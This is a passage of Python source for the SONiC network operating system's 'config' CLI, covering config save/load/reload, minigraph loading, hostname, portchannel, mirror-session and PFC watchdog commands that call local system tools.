'pmon',
'radv',
'restapi',
'rsyslog-config',
'sflow',
'snmp',
'swss',
'syncd',
'teamd',
'telemetry'
]
disabled_services = _get_disabled_services_list(config_db)
for service in disabled_services:
if service in services_to_reset:
services_to_reset.remove(service)
execute_systemctl(services_to_reset, SYSTEMCTL_ACTION_RESET_FAILED)
def _restart_services(config_db):
# This list is order-dependent. Please add services in the order they should be started
# on Mellanox platform pmon is started by syncd
services_to_restart = [
'hostname-config',
'interfaces-config',
'ntp-config',
'rsyslog-config',
'swss',
'bgp',
'pmon',
'lldp',
'hostcfgd',
'nat',
'sflow',
'restapi',
'telemetry'
]
disabled_services = _get_disabled_services_list(config_db)
for service in disabled_services:
if service in services_to_restart:
services_to_restart.remove(service)
if asic_type == 'mellanox' and 'pmon' in services_to_restart:
services_to_restart.remove('pmon')
execute_systemctl(services_to_restart, SYSTEMCTL_ACTION_RESTART)
# Reload Monit configuration to pick up new hostname in case it changed
click.echo("Reloading Monit configuration ...")
clicommon.run_command("sudo monit reload")
def interface_is_in_vlan(vlan_member_table, interface_name):
""" Check if an interface is in a vlan """
for _, intf in vlan_member_table:
if intf == interface_name:
return True
return False
def interface_is_in_portchannel(portchannel_member_table, interface_name):
""" Check if an interface is part of portchannel """
for _, intf in portchannel_member_table:
if intf == interface_name:
return True
return False
def interface_has_mirror_config(mirror_table, interface_name):
""" Check if port is already configured with mirror config """
for _, v in mirror_table.items():
if 'src_port' in v and v['src_port'] == interface_name:
return True
if 'dst_port' in v and v['dst_port'] == interface_name:
return True
return False
def validate_mirror_session_config(config_db, session_name, dst_port, src_port, direction):
""" Check if SPAN mirror-session config is valid """
if len(config_db.get_entry('MIRROR_SESSION', session_name)) != 0:
click.echo("Error: {} already exists".format(session_name))
return False
vlan_member_table = config_db.get_table('VLAN_MEMBER')
mirror_table = config_db.get_table('MIRROR_SESSION')
portchannel_member_table = config_db.get_table('PORTCHANNEL_MEMBER')
if dst_port:
if not interface_name_is_valid(config_db, dst_port):
click.echo("Error: Destination Interface {} is invalid".format(dst_port))
return False
if interface_is_in_vlan(vlan_member_table, dst_port):
click.echo("Error: Destination Interface {} has vlan config".format(dst_port))
return False
if interface_has_mirror_config(mirror_table, dst_port):
click.echo("Error: Destination Interface {} already has mirror config".format(dst_port))
return False
if interface_is_in_portchannel(portchannel_member_table, dst_port):
click.echo("Error: Destination Interface {} has portchannel config".format(dst_port))
return False
if clicommon.is_port_router_interface(config_db, dst_port):
click.echo("Error: Destination Interface {} is a L3 interface".format(dst_port))
return False
if src_port:
for port in src_port.split(","):
if not interface_name_is_valid(config_db, port):
click.echo("Error: Source Interface {} is invalid".format(port))
return False
if dst_port and dst_port == port:
click.echo("Error: Destination Interface cant be same as Source Interface")
return False
if interface_has_mirror_config(mirror_table, port):
click.echo("Error: Source Interface {} already has mirror config".format(port))
return False
if direction:
if direction not in ['rx', 'tx', 'both']:
click.echo("Error: Direction {} is invalid".format(direction))
return False
return True
def update_sonic_environment():
"""Prepare sonic environment variable using SONiC environment template file.
"""
SONIC_ENV_TEMPLATE_FILE = os.path.join('/', "usr", "share", "sonic", "templates", "sonic-environment.j2")
SONIC_VERSION_YML_FILE = os.path.join('/', "etc", "sonic", "sonic_version.yml")
SONIC_ENV_FILE = os.path.join('/', "etc", "sonic", "sonic-environment")
if os.path.isfile(SONIC_ENV_TEMPLATE_FILE) and os.path.isfile(SONIC_VERSION_YML_FILE):
clicommon.run_command(
"{} -d -y {} -t {},{}".format(
SONIC_CFGGEN_PATH,
SONIC_VERSION_YML_FILE,
SONIC_ENV_TEMPLATE_FILE,
SONIC_ENV_FILE
),
display_cmd=True
)
# This is our main entrypoint - the main 'config' command
@click.group(cls=clicommon.AbbreviationGroup, context_settings=CONTEXT_SETTINGS)
@click.pass_context
def config(ctx):
"""SONiC command line - 'config' command"""
#
# Load asic_type for further use
#
global asic_type
try:
version_info = device_info.get_sonic_version_info()
asic_type = version_info['asic_type']
except (KeyError, TypeError):
raise click.Abort()
if asic_type == 'mellanox':
platform.add_command(mlnx.mlnx)
# Load the global config file database_global.json once.
SonicDBConfig.load_sonic_global_db_config()
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
ctx.obj = Db()
# Add groups from other modules
config.add_command(aaa.aaa)
config.add_command(aaa.tacacs)
config.add_command(chassis_modules.chassis_modules)
config.add_command(console.console)
config.add_command(feature.feature)
config.add_command(kdump.kdump)
config.add_command(kube.kubernetes)
config.add_command(muxcable.muxcable)
config.add_command(nat.nat)
config.add_command(vlan.vlan)
config.add_command(vxlan.vxlan)
@config.command()
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Existing files will be overwritten, continue?')
@click.argument('filename', required=False)
def save(filename):
"""Export current config DB to a file on disk.\n
<filename> : Names of configuration file(s) to save, separated by comma with no spaces in between
"""
num_asic = multi_asic.get_num_asics()
cfg_files = []
num_cfg_file = 1
if multi_asic.is_multi_asic():
num_cfg_file += num_asic
# If the user give the filename[s], extract the file names.
if filename is not None:
cfg_files = filename.split(',')
if len(cfg_files) != num_cfg_file:
click.echo("Input {} config file(s) separated by comma for multiple files ".format(num_cfg_file))
return
# In case of multi-asic mode we have additional config_db{NS}.json files for
# various namespaces created per ASIC. {NS} is the namespace index.
for inst in range(-1, num_cfg_file-1):
#inst = -1, refers to the linux host where there is no namespace.
if inst == -1:
namespace = None
else:
namespace = "{}{}".format(NAMESPACE_PREFIX, inst)
# Get the file from user input, else take the default file /etc/sonic/config_db{NS_id}.json
if cfg_files:
file = cfg_files[inst+1]
else:
if namespace is None:
file = DEFAULT_CONFIG_DB_FILE
else:
file = "/etc/sonic/config_db{}.json".format(inst)
if namespace is None:
command = "{} -d --print-data > {}".format(SONIC_CFGGEN_PATH, file)
else:
command = "{} -n {} -d --print-data > {}".format(SONIC_CFGGEN_PATH, namespace, file)
log.log_info("'save' executing...")
clicommon.run_command(command, display_cmd=True)
@config.command()
@click.option('-y', '--yes', is_flag=True)
@click.argument('filename', required=False)
def load(filename, yes):
"""Import a previous saved config DB dump file.
<filename> : Names of configuration file(s) to load, separated by comma with no spaces in between
"""
if filename is None:
message = 'Load config from the default config file(s) ?'
else:
message = 'Load config from the file(s) {} ?'.format(filename)
if not yes:
click.confirm(message, abort=True)
num_asic = multi_asic.get_num_asics()
cfg_files = []
num_cfg_file = 1
if multi_asic.is_multi_asic():
num_cfg_file += num_asic
# If the user give the filename[s], extract the file names.
if filename is not None:
cfg_files = filename.split(',')
if len(cfg_files) != num_cfg_file:
click.echo("Input {} config file(s) separated by comma for multiple files ".format(num_cfg_file))
return
# In case of multi-asic mode we have additional config_db{NS}.json files for
# various namespaces created per ASIC. {NS} is the namespace index.
for inst in range(-1, num_cfg_file-1):
#inst = -1, refers to the linux host where there is no namespace.
if inst == -1:
namespace = None
else:
namespace = "{}{}".format(NAMESPACE_PREFIX, inst)
# Get the file from user input, else take the default file /etc/sonic/config_db{NS_id}.json
if cfg_files:
file = cfg_files[inst+1]
else:
if namespace is None:
file = DEFAULT_CONFIG_DB_FILE
else:
file = "/etc/sonic/config_db{}.json".format(inst)
# if any of the config files in linux host OR namespace is not present, return
if not os.path.exists(file):
click.echo("The config_db file {} doesn't exist".format(file))
return
if namespace is None:
command = "{} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, file)
else:
command = "{} -n {} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, namespace, file)
log.log_info("'load' executing...")
clicommon.run_command(command, display_cmd=True)
@config.command()
@click.option('-y', '--yes', is_flag=True)
@click.option('-l', '--load-sysinfo', is_flag=True, help='load system default information (mac, portmap etc) first.')
@click.option('-n', '--no_service_restart', default=False, is_flag=True, help='Do not restart docker services')
@click.argument('filename', required=False)
@clicommon.pass_db
def reload(db, filename, yes, load_sysinfo, no_service_restart):
"""Clear current configuration and import a previous saved config DB dump file.
<filename> : Names of configuration file(s) to load, separated by comma with no spaces in between
"""
if filename is None:
message = 'Clear current config and reload config from the default config file(s) ?'
else:
message = 'Clear current config and reload config from the file(s) {} ?'.format(filename)
if not yes:
click.confirm(message, abort=True)
log.log_info("'reload' executing...")
num_asic = multi_asic.get_num_asics()
cfg_files = []
num_cfg_file = 1
if multi_asic.is_multi_asic():
num_cfg_file += num_asic
# If the user give the filename[s], extract the file names.
if filename is not None:
cfg_files = filename.split(',')
if len(cfg_files) != num_cfg_file:
click.echo("Input {} config file(s) separated by comma for multiple files ".format(num_cfg_file))
return
if load_sysinfo:
command = "{} -j {} -v DEVICE_METADATA.localhost.hwsku".format(SONIC_CFGGEN_PATH, filename)
proc = subprocess.Popen(command, shell=True, text=True, stdout=subprocess.PIPE)
cfg_hwsku, err = proc.communicate()
if err:
click.echo("Could not get the HWSKU from config file, exiting")
sys.exit(1)
else:
cfg_hwsku = cfg_hwsku.strip()
#Stop services before config push
if not no_service_restart:
log.log_info("'reload' stopping services...")
_stop_services(db.cfgdb)
# In Single ASIC platforms we have single DB service. In multi-ASIC platforms we have a global DB
# service running in the host + DB services running in each ASIC namespace created per ASIC.
# In the below logic, we get all namespaces in this platform and add an empty namespace ''
# denoting the current namespace which we are in ( the linux host )
for inst in range(-1, num_cfg_file-1):
# Get the namespace name, for linux host it is None
if inst == -1:
namespace = None
else:
namespace = "{}{}".format(NAMESPACE_PREFIX, inst)
# Get the file from user input, else take the default file /etc/sonic/config_db{NS_id}.json
if cfg_files:
file = cfg_files[inst+1]
else:
if namespace is None:
file = DEFAULT_CONFIG_DB_FILE
else:
file = "/etc/sonic/config_db{}.json".format(inst)
# Check the file exists before proceeding.
if not os.path.exists(file):
click.echo("The config_db file {} doesn't exist".format(file))
continue
if namespace is None:
config_db = ConfigDBConnector()
else:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
client = config_db.get_redis_client(config_db.CONFIG_DB)
client.flushdb()
if load_sysinfo:
if namespace is None:
command = "{} -H -k {} --write-to-db".format(SONIC_CFGGEN_PATH, cfg_hwsku)
else:
command = "{} -H -k {} -n {} --write-to-db".format(SONIC_CFGGEN_PATH, cfg_hwsku, namespace)
clicommon.run_command(command, display_cmd=True)
# For the database service running in linux host we use the file user gives as input
# or by default DEFAULT_CONFIG_DB_FILE. In the case of database service running in namespace,
# the default config_db<namespaceID>.json format is used.
if namespace is None:
if os.path.isfile(INIT_CFG_FILE):
command = "{} -j {} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, INIT_CFG_FILE, file)
else:
command = "{} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, file)
else:
if os.path.isfile(INIT_CFG_FILE):
command = "{} -j {} -j {} -n {} --write-to-db".format(SONIC_CFGGEN_PATH, INIT_CFG_FILE, file, namespace)
else:
command = "{} -j {} -n {} --write-to-db".format(SONIC_CFGGEN_PATH, file, namespace)
clicommon.run_command(command, display_cmd=True)
client.set(config_db.INIT_INDICATOR, 1)
# Migrate DB contents to latest version
db_migrator='/usr/local/bin/db_migrator.py'
if os.path.isfile(db_migrator) and os.access(db_migrator, os.X_OK):
if namespace is None:
command = "{} -o migrate".format(db_migrator)
else:
command = "{} -o migrate -n {}".format(db_migrator, namespace)
clicommon.run_command(command, display_cmd=True)
# We first run "systemctl reset-failed" to remove the "failed"
# status from all services before we attempt to restart them
if not no_service_restart:
_reset_failed_services(db.cfgdb)
log.log_info("'reload' restarting services...")
_restart_services(db.cfgdb)
@config.command("load_mgmt_config")
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Reload mgmt config?')
@click.argument('filename', default='/etc/sonic/device_desc.xml', type=click.Path(exists=True))
def load_mgmt_config(filename):
"""Reconfigure hostname and mgmt interface based on device description file."""
log.log_info("'load_mgmt_config' executing...")
command = "{} -M {} --write-to-db".format(SONIC_CFGGEN_PATH, filename)
clicommon.run_command(command, display_cmd=True)
#FIXME: After config DB daemon for hostname and mgmt interface is implemented, we'll no longer need to do manual configuration here
config_data = parse_device_desc_xml(filename)
hostname = config_data['DEVICE_METADATA']['localhost']['hostname']
_change_hostname(hostname)
mgmt_conf = netaddr.IPNetwork(list(config_data['MGMT_INTERFACE'].keys())[0][1])
gw_addr = list(config_data['MGMT_INTERFACE'].values())[0]['gwaddr']
command = "ifconfig eth0 {} netmask {}".format(str(mgmt_conf.ip), str(mgmt_conf.netmask))
clicommon.run_command(command, display_cmd=True)
command = "ip route add default via {} dev eth0 table default".format(gw_addr)
clicommon.run_command(command, display_cmd=True, ignore_error=True)
command = "ip rule add from {} table default".format(str(mgmt_conf.ip))
clicommon.run_command(command, display_cmd=True, ignore_error=True)
command = "[ -f /var/run/dhclient.eth0.pid ] && kill `cat /var/run/dhclient.eth0.pid` && rm -f /var/run/dhclient.eth0.pid"
clicommon.run_command(command, display_cmd=True, ignore_error=True)
click.echo("Please note loaded setting will be lost after system reboot. To preserve setting, run `config save`.")
@config.command("load_minigraph")
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Reload config from minigraph?')
@click.option('-n', '--no_service_restart', default=False, is_flag=True, help='Do not restart docker services')
@clicommon.pass_db
def load_minigraph(db, no_service_restart):
"""Reconfigure based on minigraph."""
log.log_info("'load_minigraph' executing...")
#Stop services before config push
if not no_service_restart:
log.log_info("'load_minigraph' stopping services...")
_stop_services(db.cfgdb)
# For Single Asic platform the namespace list has the empty string
# for mulit Asic platform the empty string to generate the config
# for host
namespace_list = [DEFAULT_NAMESPACE]
num_npus = multi_asic.get_num_asics()
if num_npus > 1:
namespace_list += multi_asic.get_namespaces_from_linux()
for namespace in namespace_list:
if namespace is DEFAULT_NAMESPACE:
config_db = ConfigDBConnector()
cfggen_namespace_option = " "
ns_cmd_prefix = ""
else:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
cfggen_namespace_option = " -n {}".format(namespace)
ns_cmd_prefix = "sudo ip netns exec {} ".format(namespace)
config_db.connect()
client = config_db.get_redis_client(config_db.CONFIG_DB)
client.flushdb()
if os.path.isfile('/etc/sonic/init_cfg.json'):
command = "{} -H -m -j /etc/sonic/init_cfg.json {} --write-to-db".format(SONIC_CFGGEN_PATH, cfggen_namespace_option)
else:
command = "{} -H -m --write-to-db {}".format(SONIC_CFGGEN_PATH, cfggen_namespace_option)
clicommon.run_command(command, display_cmd=True)
client.set(config_db.INIT_INDICATOR, 1)
# get the device type
device_type = _get_device_type()
if device_type != 'MgmtToRRouter':
clicommon.run_command("pfcwd start_default", display_cmd=True)
# Update SONiC environmnet file
update_sonic_environment()
if os.path.isfile('/etc/sonic/acl.json'):
clicommon.run_command("acl-loader update full /etc/sonic/acl.json", display_cmd=True)
# generate QoS and Buffer configs
clicommon.run_command("config qos reload --no-dynamic-buffer", display_cmd=True)
# Write latest db version string into db
db_migrator='/usr/local/bin/db_migrator.py'
if os.path.isfile(db_migrator) and os.access(db_migrator, os.X_OK):
for namespace in namespace_list:
if namespace is DEFAULT_NAMESPACE:
cfggen_namespace_option = " "
else:
cfggen_namespace_option = " -n {}".format(namespace)
clicommon.run_command(db_migrator + ' -o set_version' + cfggen_namespace_option)
# We first run "systemctl reset-failed" to remove the "failed"
# status from all services before we attempt to restart them
if not no_service_restart:
_reset_failed_services(db.cfgdb)
#FIXME: After config DB daemon is implemented, we'll no longer need to restart every service.
log.log_info("'load_minigraph' restarting services...")
_restart_services(db.cfgdb)
click.echo("Please note setting loaded from minigraph will be lost after system reboot. To preserve setting, run `config save`.")
#
# 'hostname' command
#
@config.command('hostname')
@click.argument('new_hostname', metavar='<new_hostname>', required=True)
def hostname(new_hostname):
"""Change device hostname without impacting the traffic."""
config_db = ConfigDBConnector()
config_db.connect()
config_db.mod_entry('DEVICE_METADATA' , 'localhost', {"hostname" : new_hostname})
try:
command = "service hostname-config restart"
clicommon.run_command(command, display_cmd=True)
except SystemExit as e:
click.echo("Restarting hostname-config service failed with error {}".format(e))
raise
# Reload Monit configuration to pick up new hostname in case it changed
click.echo("Reloading Monit configuration ...")
clicommon.run_command("sudo monit reload")
click.echo("Please note loaded setting will be lost after system reboot. To preserve setting, run `config save`.")
#
# 'synchronous_mode' command ('config synchronous_mode ...')
#
@config.command('synchronous_mode')
@click.argument('sync_mode', metavar='<enable|disable>', required=True)
def synchronous_mode(sync_mode):
""" Enable or disable synchronous mode between orchagent and syncd \n
swss restart required to apply the configuration \n
Options to restart swss and apply the configuration: \n
1. config save -y \n
config reload -y \n
2. systemctl restart swss
"""
if sync_mode == 'enable' or sync_mode == 'disable':
config_db = ConfigDBConnector()
config_db.connect()
config_db.mod_entry('DEVICE_METADATA' , 'localhost', {"synchronous_mode" : sync_mode})
click.echo("""Wrote %s synchronous mode into CONFIG_DB, swss restart required to apply the configuration: \n
Option 1. config save -y \n
config reload -y \n
Option 2. systemctl restart swss""" % sync_mode)
else:
raise click.BadParameter("Error: Invalid argument %s, expect either enable or disable" % sync_mode)
#
# 'portchannel' group ('config portchannel ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
# TODO add "hidden=True if this is a single ASIC platform, once we have click 7.0 in all branches.
@click.option('-n', '--namespace', help='Namespace name',
required=True if multi_asic.is_multi_asic() else False, type=click.Choice(multi_asic.get_namespace_list()))
@click.pass_context
def portchannel(ctx, namespace):
# Set namespace to default_namespace if it is None.
if namespace is None:
namespace = DEFAULT_NAMESPACE
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=str(namespace))
config_db.connect()
ctx.obj = {'db': config_db, 'namespace': str(namespace)}
@portchannel.command('add')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.option('--min-links', default=0, type=int)
@click.option('--fallback', default='false')
@click.pass_context
def add_portchannel(ctx, portchannel_name, min_links, fallback):
"""Add port channel"""
db = ctx.obj['db']
fvs = {'admin_status': 'up',
'mtu': '9100'}
if min_links != 0:
fvs['min_links'] = str(min_links)
if fallback != 'false':
fvs['fallback'] = 'true'
db.set_entry('PORTCHANNEL', portchannel_name, fvs)
@portchannel.command('del')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.pass_context
def remove_portchannel(ctx, portchannel_name):
"""Remove port channel"""
db = ctx.obj['db']
if len([(k, v) for k, v in db.get_table('PORTCHANNEL_MEMBER') if k == portchannel_name]) != 0:
click.echo("Error: Portchannel {} contains members. Remove members before deleting Portchannel!".format(portchannel_name))
else:
db.set_entry('PORTCHANNEL', portchannel_name, None)
@portchannel.group(cls=clicommon.AbbreviationGroup, name='member')
@click.pass_context
def portchannel_member(ctx):
pass
@portchannel_member.command('add')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.argument('port_name', metavar='<port_name>', required=True)
@click.pass_context
def add_portchannel_member(ctx, portchannel_name, port_name):
"""Add member to port channel"""
db = ctx.obj['db']
if clicommon.is_port_mirror_dst_port(db, port_name):
ctx.fail("{} is configured as mirror destination port".format(port_name))
# Check if the member interface given by user is valid in the namespace.
if port_name.startswith("Ethernet") is False or interface_name_is_valid(db, port_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
# Dont proceed if the port channel name is not valid
if is_portchannel_name_valid(portchannel_name) is False:
ctx.fail("{} is invalid!, name should have prefix '{}' and suffix '{}'"
.format(portchannel_name, CFG_PORTCHANNEL_PREFIX, CFG_PORTCHANNEL_NO))
# Dont proceed if the port channel does not exist
if is_portchannel_present_in_db(db, portchannel_name) is False:
ctx.fail("{} is not present.".format(portchannel_name))
# Dont allow a port to be member of port channel if it is configured with an IP address
for key in db.get_table('INTERFACE').keys():
if type(key) != tuple:
continue
if key[0] == port_name:
ctx.fail(" {} has ip address {} configured".format(port_name, key[1]))
return
# Dont allow a port to be member of port channel if it is configured as a VLAN member
for k,v in db.get_table('VLAN_MEMBER'):
if v == port_name:
ctx.fail("%s Interface configured as VLAN_MEMBER under vlan : %s" %(port_name,str(k)))
return
# Dont allow a port to be member of port channel if it is already member of a port channel
for k,v in db.get_table('PORTCHANNEL_MEMBER'):
if v == port_name:
ctx.fail("{} Interface is already member of {} ".format(v,k))
# Dont allow a port to be member of port channel if its speed does not match with existing members
for k,v in db.get_table('PORTCHANNEL_MEMBER'):
if k == portchannel_name:
member_port_entry = db.get_entry('PORT', v)
port_entry = db.get_entry('PORT', port_name)
if member_port_entry is not None and port_entry is not None:
member_port_speed = member_port_entry.get(PORT_SPEED)
port_speed = port_entry.get(PORT_SPEED)
if member_port_speed != port_speed:
ctx.fail("Port speed of {} is different than the other members of the portchannel {}"
.format(port_name, portchannel_name))
# Dont allow a port to be member of port channel if its MTU does not match with portchannel
portchannel_entry = db.get_entry('PORTCHANNEL', portchannel_name)
if portchannel_entry and portchannel_entry.get(PORT_MTU) is not None :
port_entry = db.get_entry('PORT', port_name)
if port_entry and port_entry.get(PORT_MTU) is not None:
port_mtu = port_entry.get(PORT_MTU)
portchannel_mtu = portchannel_entry.get(PORT_MTU)
if portchannel_mtu != port_mtu:
ctx.fail("Port MTU of {} is different than the {} MTU size"
.format(port_name, portchannel_name))
db.set_entry('PORTCHANNEL_MEMBER', (portchannel_name, port_name),
{'NULL': 'NULL'})
@portchannel_member.command('del')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.argument('port_name', metavar='<port_name>', required=True)
@click.pass_context
def del_portchannel_member(ctx, portchannel_name, port_name):
"""Remove member from portchannel"""
# Dont proceed if the port channel name is not valid
if is_portchannel_name_valid(portchannel_name) is False:
ctx.fail("{} is invalid!, name should have prefix '{}' and suffix '{}'"
.format(portchannel_name, CFG_PORTCHANNEL_PREFIX, CFG_PORTCHANNEL_NO))
db = ctx.obj['db']
# Check if the member interface given by user is valid in the namespace.
if interface_name_is_valid(db, port_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
# Dont proceed if the port channel does not exist
if is_portchannel_present_in_db(db, portchannel_name) is False:
ctx.fail("{} is not present.".format(portchannel_name))
# Dont proceed if the the port is not an existing member of the port channel
if not is_port_member_of_this_portchannel(db, port_name, portchannel_name):
ctx.fail("{} is not a member of portchannel {}".format(port_name, portchannel_name))
db.set_entry('PORTCHANNEL_MEMBER', (portchannel_name, port_name), None)
db.set_entry('PORTCHANNEL_MEMBER', portchannel_name + '|' + port_name, None)
#
# 'mirror_session' group ('config mirror_session ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='mirror_session')
def mirror_session():
pass
#
# 'add' subgroup ('config mirror_session add ...')
#
@mirror_session.command('add')
@click.argument('session_name', metavar='<session_name>', required=True)
@click.argument('src_ip', metavar='<src_ip>', required=True)
@click.argument('dst_ip', metavar='<dst_ip>', required=True)
@click.argument('dscp', metavar='<dscp>', required=True)
@click.argument('ttl', metavar='<ttl>', required=True)
@click.argument('gre_type', metavar='[gre_type]', required=False)
@click.argument('queue', metavar='[queue]', required=False)
@click.option('--policer')
def add(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer):
""" Add ERSPAN mirror session.(Legacy support) """
add_erspan(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer)
@mirror_session.group(cls=clicommon.AbbreviationGroup, name='erspan')
@click.pass_context
def erspan(ctx):
""" ERSPAN mirror_session """
pass
#
# 'add' subcommand
#
@erspan.command('add')
@click.argument('session_name', metavar='<session_name>', required=True)
@click.argument('src_ip', metavar='<src_ip>', required=True)
@click.argument('dst_ip', metavar='<dst_ip>', required=True)
@click.argument('dscp', metavar='<dscp>', required=True)
@click.argument('ttl', metavar='<ttl>', required=True)
@click.argument('gre_type', metavar='[gre_type]', required=False)
@click.argument('queue', metavar='[queue]', required=False)
@click.argument('src_port', metavar='[src_port]', required=False)
@click.argument('direction', metavar='[direction]', required=False)
@click.option('--policer')
def add(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer, src_port, direction):
""" Add ERSPAN mirror session """
add_erspan(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer, src_port, direction)
def gather_session_info(session_info, policer, queue, src_port, direction):
if policer:
session_info['policer'] = policer
if queue:
session_info['queue'] = queue
if src_port:
if clicommon.get_interface_naming_mode() == "alias":
src_port_list = []
for port in src_port.split(","):
src_port_list.append(interface_alias_to_name(None, port))
src_port=",".join(src_port_list)
session_info['src_port'] = src_port
if not direction:
direction = "both"
session_info['direction'] = direction.upper()
return session_info
def add_erspan(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer, src_port=None, direction=None):
session_info = {
"type" : "ERSPAN",
"src_ip": src_ip,
"dst_ip": dst_ip,
"dscp": dscp,
"ttl": ttl
}
if gre_type:
session_info['gre_type'] = gre_type
session_info = gather_session_info(session_info, policer, queue, src_port, direction)
"""
For multi-npu platforms we need to program all front asic namespaces
"""
namespaces = multi_asic.get_all_namespaces()
if not namespaces['front_ns']:
config_db = ConfigDBConnector()
config_db.connect()
if validate_mirror_session_config(config_db, session_name, None, src_port, direction) is False:
return
config_db.set_entry("MIRROR_SESSION", session_name, session_info)
else:
per_npu_configdb = {}
for front_asic_namespaces in namespaces['front_ns']:
per_npu_configdb[front_asic_namespaces] = ConfigDBConnector(use_unix_socket_path=True, namespace=front_asic_namespaces)
per_npu_configdb[front_asic_namespaces].connect()
if validate_mirror_session_config(per_npu_configdb[front_asic_namespaces], session_name, None, src_port, direction) is False:
return
per_npu_configdb[front_asic_namespaces].set_entry("MIRROR_SESSION", session_name, session_info)
@mirror_session.group(cls=clicommon.AbbreviationGroup, name='span')
@click.pass_context
def span(ctx):
""" SPAN mirror session """
pass
@span.command('add')
@click.argument('session_name', metavar='<session_name>', required=True)
@click.argument('dst_port', metavar='<dst_port>', required=True)
@click.argument('src_port', metavar='[src_port]', required=False)
@click.argument('direction', metavar='[direction]', required=False)
@click.argument('queue', metavar='[queue]', required=False)
@click.option('--policer')
def add(session_name, dst_port, src_port, direction, queue, policer):
""" Add SPAN mirror session """
add_span(session_name, dst_port, src_port, direction, queue, policer)
def add_span(session_name, dst_port, src_port, direction, queue, policer):
if clicommon.get_interface_naming_mode() == "alias":
dst_port = interface_alias_to_name(None, dst_port)
if dst_port is None:
click.echo("Error: Destination Interface {} is invalid".format(dst_port))
return
session_info = {
"type" : "SPAN",
"dst_port": dst_port,
}
session_info = gather_session_info(session_info, policer, queue, src_port, direction)
"""
For multi-npu platforms we need to program all front asic namespaces
"""
namespaces = multi_asic.get_all_namespaces()
if not namespaces['front_ns']:
config_db = ConfigDBConnector()
config_db.connect()
if validate_mirror_session_config(config_db, session_name, dst_port, src_port, direction) is False:
return
config_db.set_entry("MIRROR_SESSION", session_name, session_info)
else:
per_npu_configdb = {}
for front_asic_namespaces in namespaces['front_ns']:
per_npu_configdb[front_asic_namespaces] = ConfigDBConnector(use_unix_socket_path=True, namespace=front_asic_namespaces)
per_npu_configdb[front_asic_namespaces].connect()
if validate_mirror_session_config(per_npu_configdb[front_asic_namespaces], session_name, dst_port, src_port, direction) is False:
return
per_npu_configdb[front_asic_namespaces].set_entry("MIRROR_SESSION", session_name, session_info)
@mirror_session.command()
@click.argument('session_name', metavar='<session_name>', required=True)
def remove(session_name):
""" Delete mirror session """
"""
For multi-npu platforms we need to program all front asic namespaces
"""
namespaces = multi_asic.get_all_namespaces()
if not namespaces['front_ns']:
config_db = ConfigDBConnector()
config_db.connect()
config_db.set_entry("MIRROR_SESSION", session_name, None)
else:
per_npu_configdb = {}
for front_asic_namespaces in namespaces['front_ns']:
per_npu_configdb[front_asic_namespaces] = ConfigDBConnector(use_unix_socket_path=True, namespace=front_asic_namespaces)
per_npu_configdb[front_asic_namespaces].connect()
per_npu_configdb[front_asic_namespaces].set_entry("MIRROR_SESSION", session_name, None)
#
# 'pfcwd' group ('config pfcwd ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def pfcwd():
"""Configure pfc watchdog """
pass
@pfcwd.command()
@click.option('--action', '-a', type=click.Choice(['drop', 'forward', 'alert']))
@click.option('--restoration-time', '-r', type=click.IntRange(100, 60000))
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('ports', nargs=-1)
@click.argument('detection-time', type=click.IntRange(100, 5000))
def start(action, restoration_time, ports, detection_time, verbose):
"""
Start PFC watchdog on port(s). To config all ports, use all as input.
Example:
config pfcwd start --action drop ports all detection-time 400 --restoration-time 400
"""
cmd = "pfcwd start"
if action:
cmd += " --action {}".format(action)
if ports:
ports = set(ports) - set(['ports', 'detection-time'])
cmd += " {}".format(' '.join(ports))
if detection_time:
cmd += " {}".format(detection_time)
if restoration_time:
cmd += " --restoration-time {}".format(restoration_time)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command()
@click.option('--verbose', is_flag=True, help="Enable verbose output")
def stop(verbose):
""" Stop PFC watchdog """
cmd = "pfcwd stop"
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command()
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('poll_interval', type=click.IntRange(100, 3000))
def interval(poll_interval, verbose):
""" Set PFC watchdog counter polling interval (ms) """
cmd = "pfcwd interval {}".format(poll_interval)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command('counter_poll')
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('counter_poll', type=click.Choice(['enable', 'disable']))
def counter_poll(counter_poll, verbose):
""" Enable/disable counter polling """
cmd = "pfcwd counter_poll {}".format(counter_poll)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command('big_red_switch')
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('big_red_switch', type=click.Choice(['enable', 'disable']))
def big_red_switch(big_red_switch, verbose):
""" Enable/disable BIG_RED_SWITCH mode """
cmd = "pfcwd big_red_switch {}".format(big_red_switch)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command('start_default')
@click.option('--verbose', is_flag=True, help="Enable verbose output")
def start_default(verbose):
